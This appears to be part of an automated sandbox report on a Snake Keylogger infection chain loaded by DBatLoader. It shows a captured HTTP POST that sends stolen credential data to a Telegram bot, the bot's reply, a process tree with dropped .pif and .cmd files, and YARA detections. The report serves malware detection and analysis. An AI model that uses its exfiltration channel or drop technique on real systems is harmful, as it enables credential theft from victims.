                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd26086a764c20
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:51 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 30 38 36 61 37 36 34 63 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd26086a764c20Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:51 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:51 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:51 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 33 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":419014,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535131,"documen


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:10:16:37
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\D.G Governor Istek,Docx.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'019'392 bytes
                                                                                                                      MD5 hash:7D212D2DAB091BEC36A906828D270C65
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2280883342.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2245824423.0000000002366000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2157901937.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:10:16:45
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                      Imagebase:0x790000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:10:16:45
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:10:16:45
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:175'800 bytes
                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D37F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:10:16:55
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\Cneehezx.PIF
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\Public\Libraries\Cneehezx.PIF"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'019'392 bytes
                                                                                                                      MD5 hash:7D212D2DAB091BEC36A906828D270C65
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 53%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:10:16:56
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                      Imagebase:0x790000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:10:16:56
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:10:16:56
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:175'800 bytes
                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.3435325759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000001.2342337171.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:10:17:03
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\Cneehezx.PIF
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\Public\Libraries\Cneehezx.PIF"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'019'392 bytes
                                                                                                                      MD5 hash:7D212D2DAB091BEC36A906828D270C65
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:11
                                                                                                                      Start time:10:17:04
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                      Imagebase:0x790000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:12
                                                                                                                      Start time:10:17:04
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:13
                                                                                                                      Start time:10:17:04
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:175'800 bytes
                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030E4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000001.2421840333.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000002.3435459349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Has exited:false

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:16.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:10.3%
                                                                                                                        Total number of Nodes:290
                                                                                                                        Total number of Limit Nodes:16
